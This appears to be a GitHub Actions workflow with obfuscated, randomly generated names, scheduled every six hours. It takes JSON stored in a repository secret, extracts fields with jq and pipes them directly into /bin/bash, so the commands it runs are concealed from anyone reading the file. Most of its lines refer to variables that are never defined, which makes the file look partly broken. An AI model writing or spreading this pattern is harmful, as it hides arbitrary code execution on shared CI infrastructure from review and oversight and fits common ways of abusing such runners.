name: yewuqucac
on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'
jobs:  # 13327
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yewuqucac
        env:
          l15314: ${{ secrets.l15314 }}
        run: |
          echo $l15314 | jq -r .so2423 | /bin/bash
          echo $mrc17517 | jq -r .pslea6 | /bin/bash
          echo $esx4020 | jq -r .x280 | /bin/bash
          echo $bh6586 | jq -r .yx30 | /bin/bash
          echo $adtl7 | jq -r .ru38007 | /bin/bash
          echo $zvbt89 | jq -r .qymf50 | /bin/bash
          echo $t1218 | jq -r .laego329 | /bin/bash
          echo $o164 | jq -r .kng60055 | /bin/bash
          echo $kvdx82915 | jq -r .s13 | /bin/bash

